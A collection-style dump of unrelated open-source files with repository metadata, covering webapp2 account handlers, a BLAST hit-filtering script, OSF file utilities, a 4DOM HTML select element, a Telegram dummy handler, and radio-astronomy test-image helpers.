Social Login for social in models_boilerplate.SocialUser.get_by_user(user_info.key): social.key.delete() user_info.key.delete() ndb.Key("Unique", "User.username:%s" % user.username).delete_async() ndb.Key("Unique", "User.auth_id:own:%s" % user.username).delete_async() ndb.Key("Unique", "User.email:%s" % user.email).delete_async() #TODO: Delete UserToken objects self.auth.unset_session() # display successful message msg = _("The account has been successfully deleted.") self.add_message(msg, 'success') return self.redirect_to('home') except (InvalidAuthIdError, InvalidPasswordError), e: # Returns error message to self.response.write in # the BaseHandler.dispatcher message = _("Incorrect password! 
Please enter your current password to change your account settings.") self.add_message(message, 'error') return self.redirect_to('delete-account') except (AttributeError, TypeError), e: login_error_message = _('Your session has expired.') self.add_message(login_error_message, 'error') self.redirect_to('login') @webapp2.cached_property def form(self): return forms.DeleteAccountForm(self) class ChannelConnected(BaseHandler): def post(self,**kwargs): logger.warn("connected") from_person = self.request.get('from') (person,room)= from_person.split("_") memcache_key=room people=memcache.get(memcache_key) if people: people.append(person) memcache.set(room,people,3600) else: memcache.set(room,[person],3600) class ChannelDisconnected(BaseHandler): def post(self,**kwargs): logger.warn("disconnected") from_person = self.request.get('from') (person,room)= from_person.split("_") memcache_key=room people=memcache.get(memcache_key) if people: try: people.remove(person) memcache.set(room,people,3600) except: pass else: memcache.set(room,[],3600) class TestAngular(BaseHandler): def get(self,**kwargs): params = { 'me' : "%d"%random.randint(1,10000), 'game_key' : "todo" } token = channel.create_channel('%s_%s'%(params['me'],params['game_key'])) params['token'] = token return self.render_template('index.html', **params)
krismcfarlin/todo_angular_endpoints_sockets
bp_content/themes/default/handlers/handlers.py
Python
lgpl-3.0
10,823
0.00462
#!/usr/bin/python from multiprocessing import Pool import time import os import sys import argparse from homolog4 import * from collections import defaultdict # Copyright(C) 2014 David Ream # Released under Biopython license. http://www.biopython.org/DIST/LICENSE # Do not remove this comment # This exists to make the main function easier to read. It contains code to run the argument parser, and does nothing else. def parser_code(): parser = argparse.ArgumentParser(description="Filter out redundant hits, by loci, from the initial BLAST parse and remove organisms that lack neighborhoods.") parser.add_argument("-i", "--infolder", dest="infolder", default='./blast_parse_raw_operon/', metavar="FOLDER", help="A folder that contains the initial parse of the BLAST hits. This program assumes that no loci filtering or organism removal has been done yet.") parser.add_argument("-o", "--outfolder", dest="outfolder", metavar="FOLDER", default='./blast_parse/', help="Folder where the BLAST results will be stored. Default is the folder './blast_result/'.") parser.add_argument("-q", "--operon_query", dest="operon_query", default='./regulonDB/operon_names_and_genes.txt', metavar="FILE", help="A file that contains the names and genes comprising the operons that are under investigation.") parser.add_argument("-r", "--reference", dest="reference", default='NC_000913', metavar="STRING", help="An accession number of the reference organism.") parser.add_argument("-f", "--filter", dest="filter", default='', metavar="FILE", help="A file that contains the accession numbers of the organisms that are under investigation.") parser.add_argument("-n", "--num_proc", dest="num_proc", metavar="INT", default = os.sysconf("SC_NPROCESSORS_CONF"), type=int, help="Number of processors that you want this script to run on. The default is every CPU that the system has.") parser.add_argument("-g", "--max_gap", dest="max_intergenic_gap", metavar="INT", default = 500, type=int, help="Length of the largest allowable intergenic gap allowed in determining a gene neighborhood. Default is 500 nucleotides") return parser.parse_args() def check_options(parsed_args): if os.path.isdir(parsed_args.infolder): infolder = parsed_args.infolder else: print "The folder %s does not exist." % parsed_args.infolder sys.exit() # if the directory that the user specifies does not exist, then the program makes it for them. if not os.path.isdir(parsed_args.outfolder): os.makedirs(parsed_args.outfolder) outfolder = parsed_args.outfolder if outfolder[-1] != '/': outfolder = outfolder + '/' if os.path.exists(parsed_args.operon_query): operon_query = parsed_args.operon_query else: print "The file %s does not exist." % parsed_args.operon_query sys.exit() if os.path.exists(parsed_args.filter): filter_file = parsed_args.filter elif parsed_args.filter == '': filter_file = parsed_args.filter else: print "The file %s does not exist." % parsed_args.filter sys.exit() if os.path.exists(parsed_args.operon_query): filter_file = parsed_args.operon_query else: print "The file %s does not exist." 
% parsed_args.operon_query sys.exit() # section of code that deals determining the number of CPU cores that will be used by the program if parsed_args.num_proc > os.sysconf("SC_NPROCESSORS_CONF"): num_proc = os.sysconf("SC_NPROCESSORS_CONF") elif parsed_args.num_proc < 1: num_proc = 1 else: num_proc = int(parsed_args.num_proc) if parsed_args.num_proc < 1: max_intergenic_gap = 1 else: max_intergenic_gap = int(parsed_args.max_intergenic_gap) return infolder, outfolder, operon_query, filter_file, num_proc, operon_query, max_intergenic_gap #this function will return all of the files that are in a directory. os.walk is recursive traversal. def returnRecursiveDirFiles(root_dir): result = [] for path, dir_name, flist in os.walk(root_dir): for f in flist: fname = os.path.join(path, f) if os.path.isfile(fname): result.append(fname) return result # this function will return a dictionary of operon keyed off the operon name with data values in the form # of a list of homologs which are homologous. ex. [abcA, abcB] def return_self_homolog_dict(operon_list = 'operon_name_and_genes.txt', prot_file = 'operon_protein_query.fa', rna_file = 'operon_rna_query.fa'): # makes a dictionary keyed by operon name and a list of the gene contained by the operon operon_dict = {} for line in [i.strip() for i in open(operon_list).readlines()]: tmp = line.split('\t') operon_dict.update({tmp[0]:tmp[1:]}) # set up databases for the different types of genes # for proteins -p must be set to true cmd = "formatdb -i %s -p T -o F" % (prot_file) os.system(cmd) # for RNA genes -p must be set to false #cmd = "formatdb -i %s -p F -o F" % (rna_file) #os.system(cmd) # blast each set of genes against itself '''cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt') os.system( cmd )''' cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 8" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt') os.system( cmd ) #cmd = "blastall -p blastn -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), rna_file, rna_file, '1e-10', 'self_rna.txt') #os.system( cmd ) # in this next section i will read in the resulting blast results, and construct a dictionary which will be keyed off gene name and provide a list # of homologs from the operon set. This list will allow the program to filter out spurious results. We will miss fusions of homologous genes, but # hopefully this will be a rare event in our dataset, untill this can be revised lst = [i.strip() for i in open('self_prot.txt').readlines() if i[0] != '#'] #for line in [i.strip() for i in open('self_rna.txt').readlines() if i[0] != '#']: # lst.append(line) result = {} print "got here 1" for line in lst: source, hit = line.split('\t')[0:2] source_annotation = source.split('|')[2] hit_annotation = hit.split('|')[2] # we have two genes in the test set that are homologous if source_annotation != hit_annotation: if source_annotation not in result.keys(): result.update({source_annotation: [hit_annotation]}) else: result[source_annotation].append(hit_annotation) print "got here 2" return result # The purpose of this function is to filter out the spurious hits on a locus, and determine the annotation of the gene at # that position. To do this the program will make a dict of each [locus/start] ? and then determine the annotations that # exist for it. If there are two annotations that have homologous genes then the best hit will be used. 
if there are two # annotations for a locus which are not homologous then some sort of hit analysis will be performed to determine is there # is a good candidate for a gene fusion. (should look at papers on this). When done the function will report a list of # homologs that are ordered by start position whichi have been filtered for the best hit, or as a fusion. def filter_locus_hits(h_list, self_homolog_dict): pass def main(): start = time.time() print time.time() - start # ./blast_parse.py -f phylo_order.txt if __name__ == '__main__': main()
reamdc1/gene_block_evolution_old
loci_filtering.py
Python
gpl-3.0
8,117
0.014291
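return_self_homolog_dict above shells out to formatdb/blastall and then folds the tabular (-m 8) BLAST output into a mapping from a gene annotation to its within-operon homologs. The parsing step in isolation, as a hedged sketch; the '|'-delimited ID layout with the annotation in the third field is an assumption mirrored from the split('|')[2] calls in the original.

from collections import defaultdict


def homologs_from_tabular_blast(lines):
    """Build {annotation: [homologous annotations]} from tabular (-m 8) BLAST lines.

    Assumes query/subject IDs are '|'-delimited with the gene annotation in the
    third field, as in the file above.
    """
    result = defaultdict(list)
    for line in lines:
        if not line.strip() or line.startswith('#'):
            continue
        source, hit = line.split('\t')[0:2]
        source_annot = source.split('|')[2]
        hit_annot = hit.split('|')[2]
        if source_annot != hit_annot and hit_annot not in result[source_annot]:
            result[source_annot].append(hit_annot)
    return dict(result)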
from modularodm.exceptions import ValidationValueError def copy_files(src, target_node, parent=None, name=None): """Copy the files from src to the target node :param Folder src: The source to copy children from :param Node target_node: The node settings of the project to copy files to :param Folder parent: The parent of to attach the clone of src to, if applicable """ assert not parent or not parent.is_file, 'Parent must be a folder' cloned = src.clone().wrapped() cloned.parent = parent cloned.node = target_node cloned.name = name or cloned.name if src.is_file: cloned.versions = src.versions cloned.save() if not src.is_file: for child in src.children: copy_files(child, target_node, parent=cloned) return cloned class GenWrapper(object): """A Wrapper for MongoQuerySets Overrides __iter__ so for loops will always return wrapped objects. All other methods are proxied to the underlying QuerySet """ def __init__(self, mqs): self.mqs = mqs def __iter__(self): """Returns a generator that wraps all StoredFileNodes returned from self.mqs """ return (x.wrapped() for x in self.mqs) def __repr__(self): return '<website.files.utils.GenWrapper({!r})>'.format(self.mqs) def __getitem__(self, x): """__getitem__ does not default to __getattr__ so it must be explicitly overriden """ return self.mqs[x].wrapped() def __len__(self): """__len__ does not default to __getattr__ so it must be explicitly overriden """ return len(self.mqs) def __getattr__(self, name): if 'mqs' in self.__dict__: try: return getattr(self.mqs, name) except AttributeError: pass # Avoids error message about the underlying object return object.__getattribute__(self, name) def validate_location(value): if value is None: return # Allow for None locations but not broken dicts from website.addons.osfstorage import settings for key in ('service', settings.WATERBUTLER_RESOURCE, 'object'): if key not in value: raise ValidationValueError('Location {} missing key "{}"'.format(value, key)) def insort(col, element, get=lambda x: x): """Python's bisect does not allow for a get/key so it can not be used on a list of dictionaries. Inserts element into the sorted collection col via a binary search. if element is not directly compairable the kwarg get may be a callable that transforms element into a compairable object. ie: A lambda that returns a certain key of a dict or attribute of an object :param list col: The collection to insort into :param ? element: The Element to be insortted into col :param callable get: A callable that take a type of element and returns a compairable """ if not col: # If collection is empty go ahead and insert at the first position col.insert(0, element) return col lo, hi = 0, len(col) # Binary search for the correct position while lo < hi: mid = int((hi + lo) / 2) if get(col[mid]) > get(element): hi = mid else: lo = mid + 1 col.insert(lo, element) return col
arpitar/osf.io
website/files/utils.py
Python
apache-2.0
3,388
0.000885
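insort in the file above re-implements binary insertion because the bisect module available to this codebase has no key-style argument, so a get callable is threaded through instead. A small hedged usage sketch; the import path simply mirrors the path listed for this row.

from website.files.utils import insort

versions = [{'number': 1}, {'number': 3}, {'number': 4}]
insort(versions, {'number': 2}, get=lambda v: v['number'])
# versions is now sorted by 'number': [{'number': 1}, {'number': 2}, {'number': 3}, {'number': 4}]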
######################################################################## # # File Name: HTMLSelectElement.py # # """ WWW: http://4suite.com/4DOM e-mail: support@4suite.com Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved. See http://4suite.com/COPYRIGHT for license and copyright information """ from xml.dom import implementation from xml.dom import IndexSizeErr from xml.dom.html.HTMLElement import HTMLElement import string class HTMLSelectElement(HTMLElement): def __init__(self, ownerDocument, nodeName='SELECT'): HTMLElement.__init__(self, ownerDocument, nodeName) def _get_type(self): if self._get_multiple(): return 'select-multiple' return 'select-one' def _get_selectedIndex(self): options = self._get_options() for ctr in range(len(options)): node = options.item(ctr) if node._get_selected() == 1: return ctr return -1 def _set_selectedIndex(self,index): options = self._get_options() if index < 0 or index >= len(options): raise IndexSizeErr() for ctr in range(len(options)): node = options.item(ctr) if ctr == index: node._set_selected(1) else: node._set_selected(0) def _get_value(self): options = self._get_options() node = options.item(self._get_selectedIndex()) if node.hasAttribute('VALUE'): value = node.getAttribute('VALUE') elif node.firstChild: value = node.firstChild.data else: value = '' return value def _set_value(self,value): # This doesn't seem to do anything in browsers pass def _get_length(self): return self._get_options()._get_length() def _get_options(self): children = self.getElementsByTagName('OPTION') return implementation._4dom_createHTMLCollection(children) def _get_disabled(self): if self.getAttributeNode('DISABLED'): return 1 return 0 def _set_disabled(self,disabled): if disabled: self.setAttribute('DISABLED', 'DISABLED') else: self.removeAttribute('DISABLED') def _get_multiple(self): if self.getAttributeNode('MULTIPLE'): return 1 return 0 def _set_multiple(self,mult): if mult: self.setAttribute('MULTIPLE', 'MULTIPLE') else: self.removeAttribute('MULTIPLE') def _get_name(self): return self.getAttribute('NAME') def _set_name(self,name): self.setAttribute('NAME',name) def _get_size(self): rt = self.getAttribute('SIZE') if rt != None: return string.atoi(rt) return -1 def _set_size(self,size): self.setAttribute('SIZE',str(size)) def _get_tabIndex(self): return string.atoi(self.getAttribute('TABINDEX')) def _set_tabIndex(self,tabindex): self.setAttribute('TABINDEX',str(tabindex)) def add(self,newElement,beforeElement): self.insertBefore(newElement,beforeElement) def remove(self,index): if index < 0 or index >= self._get_length: return hc = self._get_options() node = hc.item(index) self.removeChild(node) def _get_form(self): parent = self.parentNode while parent: if parent.nodeName == "FORM": return parent parent = parent.parentNode return None ### Attribute Access Mappings ### _readComputedAttrs = HTMLElement._readComputedAttrs.copy() _readComputedAttrs.update ({ 'type' : _get_type, 'length' : _get_length, 'options' : _get_options, 'form' : _get_form, 'selectedIndex' : _get_selectedIndex, 'value' : _get_value, 'disabled' : _get_disabled, 'multiple' : _get_multiple, 'name' : _get_name, 'size' : _get_size, 'tabIndex' : _get_tabIndex, }) _writeComputedAttrs = HTMLElement._writeComputedAttrs.copy() _writeComputedAttrs.update ({ 'selectedIndex' : _set_selectedIndex, 'value' : _set_value, 'disabled' : _set_disabled, 'multiple' : _set_multiple, 'name' : _set_name, 'size' : _set_size, 'tabIndex' : _set_tabIndex, }) _readOnlyAttrs = filter(lambda k,m=_writeComputedAttrs: 
not m.has_key(k), HTMLElement._readOnlyAttrs + _readComputedAttrs.keys())
alanjw/GreenOpenERP-Win-X86
python/Lib/site-packages/_xmlplus/dom/html/HTMLSelectElement.py
Python
agpl-3.0
4,750
0.008421
from telegram.handlers.base import BasePlatformHandler


class DummyHandler(BasePlatformHandler):

    def handle(self):
        print 'Channel: %s' % self.telegram.channel.name
        print 'Subject: %s' % self.telegram.subject
        print 'Message: %s' % self.telegram.content
        print 'Level: %s' % self.subscription.get_level_display()
        print 'Extra: %s' % self.extra
aquametalabs/django-telegram
telegram/handlers/dummy.py
Python
bsd-3-clause
387
0
""" Functions that aid testing in various ways. A typical use would be:: lowcore = create_named_configuration('LOWBD2-CORE') times = numpy.linspace(-3, +3, 13) * (numpy.pi / 12.0) frequency = numpy.array([1e8]) channel_bandwidth = numpy.array([1e7]) # Define the component and give it some polarisation and spectral behaviour f = numpy.array([100.0]) flux = numpy.array([f]) phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000') compabsdirection = SkyCoord(ra=17.0 * u.deg, dec=-36.5 * u.deg, frame='icrs', equinox='J2000') comp = create_skycomponent(flux=flux, frequency=frequency, direction=compabsdirection, polarisation_frame=PolarisationFrame('stokesI')) image = create_test_image(frequency=frequency, phasecentre=phasecentre, cellsize=0.001, polarisation_frame=PolarisationFrame('stokesI') vis = create_visibility(lowcore, times=times, frequency=frequency, channel_bandwidth=channel_bandwidth, phasecentre=phasecentre, weight=1, polarisation_frame=PolarisationFrame('stokesI'), integration_time=1.0) """ import csv import logging from typing import List import astropy.units as u import numpy from astropy.coordinates import SkyCoord from astropy.io import fits from astropy.wcs import WCS from astropy.wcs.utils import pixel_to_skycoord from scipy import interpolate from data_models.memory_data_models import Configuration, Image, GainTable, Skycomponent, SkyModel, PointingTable from data_models.parameters import arl_path from data_models.polarisation import PolarisationFrame from processing_components.calibration.calibration_control import create_calibration_controls from processing_components.calibration.operations import create_gaintable_from_blockvisibility, apply_gaintable from processing_components.image.operations import import_image_from_fits from processing_components.imaging.base import predict_2d, predict_skycomponent_visibility, \ create_image_from_visibility, advise_wide_field from processing_components.imaging.primary_beams import create_pb from processing_components.skycomponent.operations import create_skycomponent, insert_skycomponent, \ apply_beam_to_skycomponent, filter_skycomponents_by_flux from processing_components.visibility.base import create_blockvisibility, create_visibility from processing_components.visibility.coalesce import convert_blockvisibility_to_visibility, \ convert_visibility_to_blockvisibility from processing_library.image.operations import create_image_from_array log = logging.getLogger(__name__) def create_test_image(canonical=True, cellsize=None, frequency=None, channel_bandwidth=None, phasecentre=None, polarisation_frame=PolarisationFrame("stokesI")) -> Image: """Create a useful test image This is the test image M31 widely used in ALMA and other simulations. It is actually part of an Halpha region in M31. 
:param canonical: Make the image into a 4 dimensional image :param cellsize: :param frequency: Frequency (array) in Hz :param channel_bandwidth: Channel bandwidth (array) in Hz :param phasecentre: Phase centre of image (SkyCoord) :param polarisation_frame: Polarisation frame :return: Image """ if frequency is None: frequency = [1e8] im = import_image_from_fits(arl_path("data/models/M31.MOD")) if canonical: if polarisation_frame is None: im.polarisation_frame = PolarisationFrame("stokesI") elif isinstance(polarisation_frame, PolarisationFrame): im.polarisation_frame = polarisation_frame else: raise ValueError("polarisation_frame is not valid") im = replicate_image(im, frequency=frequency, polarisation_frame=im.polarisation_frame) if cellsize is not None: im.wcs.wcs.cdelt[0] = -180.0 * cellsize / numpy.pi im.wcs.wcs.cdelt[1] = +180.0 * cellsize / numpy.pi if frequency is not None: im.wcs.wcs.crval[3] = frequency[0] if channel_bandwidth is not None: im.wcs.wcs.cdelt[3] = channel_bandwidth[0] else: if len(frequency) > 1: im.wcs.wcs.cdelt[3] = frequency[1] - frequency[0] else: im.wcs.wcs.cdelt[3] = 0.001 * frequency[0] im.wcs.wcs.radesys = 'ICRS' im.wcs.wcs.equinox = 2000.00 if phasecentre is not None: im.wcs.wcs.crval[0] = phasecentre.ra.deg im.wcs.wcs.crval[1] = phasecentre.dec.deg # WCS is 1 relative im.wcs.wcs.crpix[0] = im.data.shape[3] // 2 + 1 im.wcs.wcs.crpix[1] = im.data.shape[2] // 2 + 1 return im def create_test_image_from_s3(npixel=16384, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015, frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]), phasecentre=None, fov=20, flux_limit=1e-3) -> Image: """Create MID test image from S3 The input catalog was generated at http://s-cubed.physics.ox.ac.uk/s3_sex using the following query:: Database: s3_sex SQL: select * from Galaxies where (pow(10,itot_151)*1000 > 1.0) and (right_ascension between -5 and 5) and (declination between -5 and 5);; Number of rows returned: 29966 For frequencies < 610MHz, there are three tables to use:: data/models/S3_151MHz_10deg.csv, use fov=10 data/models/S3_151MHz_20deg.csv, use fov=20 data/models/S3_151MHz_40deg.csv, use fov=40 For frequencies > 610MHz, there are three tables: data/models/S3_1400MHz_1mJy_10deg.csv, use flux_limit>= 1e-3 data/models/S3_1400MHz_100uJy_10deg.csv, use flux_limit < 1e-3 data/models/S3_1400MHz_1mJy_18deg.csv, use flux_limit>= 1e-3 data/models/S3_1400MHz_100uJy_18deg.csv, use flux_limit < 1e-3 The component spectral index is calculated from the 610MHz and 151MHz or 1400MHz and 610MHz, and then calculated for the specified frequencies. If polarisation_frame is not stokesI then the image will a polarised axis but the values will be zero. 
:param npixel: Number of pixels :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI")) :param cellsize: cellsize in radians :param frequency: :param channel_bandwidth: Channel width (Hz) :param phasecentre: phasecentre (SkyCoord) :param fov: fov 10 | 20 | 40 :param flux_limit: Minimum flux (Jy) :return: Image """ ras = [] decs = [] fluxes = [] if phasecentre is None: phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000') if polarisation_frame is None: polarisation_frame = PolarisationFrame("stokesI") npol = polarisation_frame.npol nchan = len(frequency) shape = [nchan, npol, npixel, npixel] w = WCS(naxis=4) # The negation in the longitude is needed by definition of RA, DEC w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]] w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0] w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ'] w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]] w.naxis = 4 w.wcs.radesys = 'ICRS' w.wcs.equinox = 2000.0 model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame) if numpy.max(frequency) > 6.1E8: if fov > 10: fovstr = '18' else: fovstr = '10' if flux_limit >= 1e-3: csvfilename = arl_path('data/models/S3_1400MHz_1mJy_%sdeg.csv' % fovstr) else: csvfilename = arl_path('data/models/S3_1400MHz_100uJy_%sdeg.csv' % fovstr) log.info('create_test_image_from_s3: Reading S3 sources from %s ' % csvfilename) else: assert fov in [10, 20, 40], "Field of view invalid: use one of %s" % ([10, 20, 40]) csvfilename = arl_path('data/models/S3_151MHz_%ddeg.csv' % (fov)) log.info('create_test_image_from_s3: Reading S3 sources from %s ' % csvfilename) with open(csvfilename) as csvfile: readCSV = csv.reader(csvfile, delimiter=',') r = 0 for row in readCSV: # Skip first row if r > 0: ra = float(row[4]) + phasecentre.ra.deg dec = float(row[5]) + phasecentre.dec.deg if numpy.max(frequency) > 6.1E8: alpha = (float(row[11]) - float(row[10])) / numpy.log10(1400.0 / 610.0) flux = numpy.power(10, float(row[10])) * numpy.power(frequency / 1.4e9, alpha) else: alpha = (float(row[10]) - float(row[9])) / numpy.log10(610.0 / 151.0) flux = numpy.power(10, float(row[9])) * numpy.power(frequency / 1.51e8, alpha) if numpy.max(flux) > flux_limit: ras.append(ra) decs.append(dec) fluxes.append(flux) r += 1 csvfile.close() assert len(fluxes) > 0, "No sources found above flux limit %s" % flux_limit log.info('create_test_image_from_s3: %d sources read' % (len(fluxes))) p = w.sub(2).wcs_world2pix(numpy.array(ras), numpy.array(decs), 1) total_flux = numpy.sum(fluxes) fluxes = numpy.array(fluxes) ip = numpy.round(p).astype('int') ok = numpy.where((0 <= ip[0, :]) & (npixel > ip[0, :]) & (0 <= ip[1, :]) & (npixel > ip[1, :]))[0] ps = ip[:, ok] fluxes = fluxes[ok] actual_flux = numpy.sum(fluxes) log.info('create_test_image_from_s3: %d sources inside the image' % (ps.shape[1])) log.info('create_test_image_from_s3: average channel flux in S3 model = %.3f, actual average channel flux in ' 'image = %.3f' % (total_flux / float(nchan), actual_flux / float(nchan))) for chan in range(nchan): for iflux, flux in enumerate(fluxes): model.data[chan, 0, ps[1, iflux], ps[0, iflux]] = flux[chan] return model def create_test_skycomponents_from_s3(polarisation_frame=PolarisationFrame("stokesI"), frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]), phasecentre=None, fov=20, flux_limit=1e-3, radius=None): """Create test image from S3 The 


def create_test_skycomponents_from_s3(polarisation_frame=PolarisationFrame("stokesI"),
                                      frequency=numpy.array([1e8]),
                                      channel_bandwidth=numpy.array([1e6]),
                                      phasecentre=None, fov=20,
                                      flux_limit=1e-3,
                                      radius=None):
    """Create test skycomponents from S3

    The input catalog was generated at http://s-cubed.physics.ox.ac.uk/s3_sex using the following query::

        Database: s3_sex
        SQL: select * from Galaxies where (pow(10,itot_151)*1000 > 1.0) and (right_ascension between -5 and 5) and (declination between -5 and 5);;

    Number of rows returned: 29966

    For frequencies < 610MHz, there are three tables to use::

        data/models/S3_151MHz_10deg.csv, use fov=10
        data/models/S3_151MHz_20deg.csv, use fov=20
        data/models/S3_151MHz_40deg.csv, use fov=40

    For frequencies > 610MHz, there are four tables:

        data/models/S3_1400MHz_1mJy_10deg.csv, use flux_limit>= 1e-3
        data/models/S3_1400MHz_100uJy_10deg.csv, use flux_limit < 1e-3
        data/models/S3_1400MHz_1mJy_18deg.csv, use flux_limit>= 1e-3
        data/models/S3_1400MHz_100uJy_18deg.csv, use flux_limit < 1e-3

    The component spectral index is calculated from the 610MHz and 151MHz or 1400MHz and 610MHz fluxes, and then
    the flux is calculated for the specified frequencies.

    If polarisation_frame is not stokesI then the components will have a polarised axis but the values will be zero.

    :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI"))
    :param frequency:
    :param channel_bandwidth: Channel width (Hz)
    :param phasecentre: phasecentre (SkyCoord)
    :param fov: fov 10 | 20 | 40
    :param flux_limit: Minimum flux (Jy)
    :param radius: Radius of sources selected around phasecentre (rad)
    :return: List of Skycomponents
    """
    ras = []
    decs = []
    fluxes = []
    names = []

    if phasecentre is None:
        phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000')

    if polarisation_frame is None:
        polarisation_frame = PolarisationFrame("stokesI")

    if numpy.max(frequency) > 6.1E8:
        if fov > 10:
            fovstr = '18'
        else:
            fovstr = '10'
        if flux_limit >= 1e-3:
            csvfilename = arl_path('data/models/S3_1400MHz_1mJy_%sdeg.csv' % fovstr)
        else:
            csvfilename = arl_path('data/models/S3_1400MHz_100uJy_%sdeg.csv' % fovstr)
        log.info('create_test_skycomponents_from_s3: Reading S3-SEX sources from %s ' % csvfilename)
    else:
        assert fov in [10, 20, 40], "Field of view invalid: use one of %s" % ([10, 20, 40])
        csvfilename = arl_path('data/models/S3_151MHz_%ddeg.csv' % (fov))
        log.info('create_test_skycomponents_from_s3: Reading S3-SEX sources from %s ' % csvfilename)

    skycomps = list()

    with open(csvfilename) as csvfile:
        readCSV = csv.reader(csvfile, delimiter=',')
        r = 0
        for row in readCSV:
            # Skip first row
            if r > 0:
                ra = float(row[4]) / numpy.cos(phasecentre.dec.rad) + phasecentre.ra.deg
                dec = float(row[5]) + phasecentre.dec.deg
                if numpy.max(frequency) > 6.1E8:
                    alpha = (float(row[11]) - float(row[10])) / numpy.log10(1400.0 / 610.0)
                    flux = numpy.power(10, float(row[10])) * numpy.power(frequency / 1.4e9, alpha)
                else:
                    alpha = (float(row[10]) - float(row[9])) / numpy.log10(610.0 / 151.0)
                    flux = numpy.power(10, float(row[9])) * numpy.power(frequency / 1.51e8, alpha)
                if numpy.max(flux) > flux_limit:
                    ras.append(ra)
                    decs.append(dec)
                    fluxes.append([[f] for f in flux])
                    names.append("S3_%s" % row[0])
            r += 1

    csvfile.close()

    assert len(fluxes) > 0, "No sources found above flux limit %s" % flux_limit

    directions = SkyCoord(ra=ras * u.deg, dec=decs * u.deg)
    if phasecentre is not None:
        separations = directions.separation(phasecentre).to('rad').value
    else:
        separations = numpy.zeros(len(names))

    for isource, name in enumerate(names):
        direction = directions[isource]
        if radius is None or separations[isource] < radius:
            if not numpy.isnan(fluxes[isource]).any():
                skycomps.append(Skycomponent(direction=direction, flux=fluxes[isource], frequency=frequency,
                                             name=names[isource], shape='Point',
                                             polarisation_frame=polarisation_frame))

    log.info('create_test_skycomponents_from_s3: %d sources found above fluxlimit inside search radius' %
             len(skycomps))

    return skycomps


def create_low_test_image_from_gleam(npixel=512, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015,
                                     frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]),
                                     phasecentre=None, kind='cubic', applybeam=False, flux_limit=0.1,
                                     flux_max=numpy.inf, flux_min=-numpy.inf,
                                     radius=None, insert_method='Nearest') -> Image:
    """Create LOW test image from the GLEAM survey

    Stokes I is estimated from a cubic spline fit to the measured fluxes. The polarised flux is always zero.

    See http://www.mwatelescope.org/science/gleam-survey The catalog is available from Vizier.

    VIII/100 GaLactic and Extragalactic All-sky MWA survey (Hurley-Walker+, 2016)

    GaLactic and Extragalactic All-sky Murchison Wide Field Array (GLEAM) survey. I: A low-frequency extragalactic
    catalogue. Hurley-Walker N., et al., Mon. Not. R. Astron. Soc., 464, 1146-1167 (2017), 2017MNRAS.464.1146H

    :param npixel: Number of pixels
    :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI"))
    :param cellsize: cellsize in radians
    :param frequency:
    :param channel_bandwidth: Channel width (Hz)
    :param phasecentre: phasecentre (SkyCoord)
    :param kind: Kind of interpolation (see scipy.interpolate.interp1d) Default: cubic
    :return: Image
    """

    if phasecentre is None:
        phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')

    if radius is None:
        radius = npixel * cellsize / numpy.sqrt(2.0)

    sc = create_low_test_skycomponents_from_gleam(flux_limit=flux_limit,
                                                  polarisation_frame=polarisation_frame,
                                                  frequency=frequency, phasecentre=phasecentre,
                                                  kind=kind, radius=radius)

    sc = filter_skycomponents_by_flux(sc, flux_min=flux_min, flux_max=flux_max)
    if polarisation_frame is None:
        polarisation_frame = PolarisationFrame("stokesI")

    npol = polarisation_frame.npol
    nchan = len(frequency)
    shape = [nchan, npol, npixel, npixel]
    w = WCS(naxis=4)
    # The negation in the longitude is needed by definition of RA, DEC
    w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]]
    w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0]
    w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ']
    w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]]
    w.naxis = 4
    w.wcs.radesys = 'ICRS'
    w.wcs.equinox = 2000.0

    model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame)

    model = insert_skycomponent(model, sc, insert_method=insert_method)
    if applybeam:
        beam = create_pb(model, telescope='LOW', use_local=False)
        model.data[...] *= beam.data[...]

    return model
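

# Hypothetical usage sketch (illustrative only, not from the original module): a small
# GLEAM-based LOW test image with the primary beam applied. Values are assumptions and
# the GLEAM_EGC.fits catalogue must be available under the ARL data directory.
def _example_create_gleam_image():
    centre = SkyCoord(ra=+15.0 * u.deg, dec=-45.0 * u.deg, frame='icrs', equinox='J2000')
    return create_low_test_image_from_gleam(npixel=256, cellsize=0.001,
                                            frequency=numpy.array([1e8]),
                                            channel_bandwidth=numpy.array([1e6]),
                                            phasecentre=centre, flux_limit=1.0,
                                            applybeam=True)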


